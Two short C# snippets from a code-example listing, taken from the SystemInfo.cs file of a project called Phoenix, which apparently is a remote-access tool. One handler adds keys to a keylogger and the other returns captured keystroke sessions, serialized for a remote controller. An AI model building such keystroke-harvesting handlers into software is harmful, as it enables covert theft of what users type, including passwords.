예제 #1
0
파일: SystemInfo.cs 프로젝트: ext0/Phoenix
 public static byte[] pressKey(Command command)
 {
     Keylogger.safeAdd(((KeypressRequest)Util.Serialization.deserialize(command.data)).key);
     return(new byte[] { });
 }
예제 #2
0
파일: SystemInfo.cs 프로젝트: ext0/Phoenix
 public static byte[] getKeystrokes(Command command)
 {
     return(Util.Serialization.serialize(Keylogger.parseSessions()));
 }